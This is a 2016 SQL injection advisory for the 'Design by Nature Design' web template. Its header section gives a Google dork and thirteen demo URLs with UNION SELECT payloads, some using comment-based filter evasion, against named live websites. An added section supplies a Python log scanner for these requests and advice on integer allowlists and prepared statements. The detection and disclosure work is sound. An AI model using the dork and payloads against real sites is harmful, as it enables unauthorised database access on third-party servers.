Design by Nature Design SQL Injection

2016.01.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################
# Exploit Title : Design by Nature Design SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.naturedesign.com.hk/
# Google Dork : intext:"Design by Nature Design" news_detail
# Date: 24 01 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# demos :
# http://www.aircadets.org.hk/chi/news_detail.php?newsID=-2511%27+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20-
# http://www.baby-q.hk/tc/news_detail.php?id=-13%27+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10--%20-
# http://ecosway.com.hk/chi/news_detail.php?id=-80%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--%20-
# http://www.grosse.hk/jp/news_detail.php?id=-50%27+union+select+1,2,3,version(),5,6,7--%20-
# http://www.akon.com.hk/web/news_detail.php?id=-24%27+union+select+1,2,3,version(),5,6,7--%20-
# http://demo.naturedesign.com.hk/client/tunghing/layout2/tc/news_detail.php?id=-7%27+union+select+1,2,3,version(),5,6,7,8,9,10,11--%20-
# http://www.eagle-tungyung.com/2012/en/news_detail.php?id=-43%27+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--%20-
# http://www.lelalove.com/en/news_detail.php?id=-9%27+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10--%20-
# http://www.bcurrisports.com/2012/news_detail.php?id=-3%27+/*!50000union*/+select+1,2,version(),4--%20-
# http://yijinhkit.edu.hk/web4/news_detail.php?id=-1%27+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--%20-
# http://www.wineworld.com.hk/2015/news_detail.php?id=-77%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version(),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86--%20-
# http://winfat.com.hk/2013/news_detail.php?newsID=-8%27+union+select+1,2,3,version(),5,6,7,8,9,10--%20-
# http://www.fisherfolks.com.hk/tc/news_detail.php?id=-15%27+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--%20-
######################
# discovered by : modiret
######################
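Every demo above follows the same shape: an integer id / newsID parameter of news_detail.php is closed off with a quote and followed by a UNION SELECT, sometimes wrapped in a MySQL /*!50000 ... */ version comment to slip past naive keyword filters. The following detection script is an added example written for this page (it is not code from the advisory author or the vendor); it scans constructed Apache/Nginx combined-format log lines, decodes the query string, normalises the MySQL comment trick, and flags requests whose id parameters are not plain integers or contain a UNION SELECT. The host addresses and the ID_PARAMS list are assumptions for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not taken from any real server) that mirror the
# request shape documented in the advisory: news_detail.php with id / newsID.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jan/2016:10:01:02 +0800] "GET /chi/news_detail.php?newsID=2511 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Jan/2016:10:01:09 +0800] "GET /chi/news_detail.php?newsID=-2511%27+union+select+1,2,3,4,5,version(),7,8,9,10--%20- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Jan/2016:10:02:15 +0800] "GET /tc/news_detail.php?id=-13%27+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10--%20- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Jan/2016:10:03:00 +0800] "GET /tc/news_detail.php?id=15 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identity, user, [timestamp], "METHOD path PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+)'
)

# Parameter names the advisory shows being injected (assumption: extend per application).
ID_PARAMS = ("id", "newsID")
INTEGER_RE = re.compile(r"^-?\d+$")
UNION_SELECT_RE = re.compile(r"union\s+(?:all\s+)?select")


def normalise(value: str) -> str:
    """Lower-case the decoded parameter and neutralise MySQL comment tricks.

    /*!50000union*/ is executed by MySQL as the keyword it wraps, so the content of a
    version comment is kept; ordinary /* ... */ comments are replaced by a space.
    """
    value = re.sub(r"/\*!\d*\s*(.*?)\*/", r"\1", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).lower()


def inspect_request(path: str) -> list:
    """Return one finding per suspicious id-style parameter in a request path."""
    findings = []
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)  # values are URL-decoded here
    for name in ID_PARAMS:
        for raw in query.get(name, []):
            indicators = []
            if not INTEGER_RE.match(raw):
                # The application only ever needs an integer here; anything else is an anomaly.
                indicators.append("non_integer_id")
            if UNION_SELECT_RE.search(normalise(raw)):
                indicators.append("union_select")
            if indicators:
                findings.append({"param": name, "value": raw, "indicators": indicators})
    return findings


def scan_log(text: str) -> list:
    """Parse combined-format log lines and collect findings with ip and path context."""
    results = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for f in inspect_request(m.group("path")):
            f.update(ip=m.group("ip"), path=m.group("path"), status=m.group("status"))
            results.append(f)
    return results


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["param"], hit["indicators"])
```

The cheapest and most robust signal is the first one: the page's own demos all replace an integer with a quoted string, so a strict integer allowlist on id / newsID at the application boundary (or in a WAF rule) catches the whole class regardless of how the UNION keyword is obfuscated. The same allowlist is the fix on the server side: cast the parameter to an integer and bind it through a prepared statement instead of concatenating it into the query (CWE-89).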

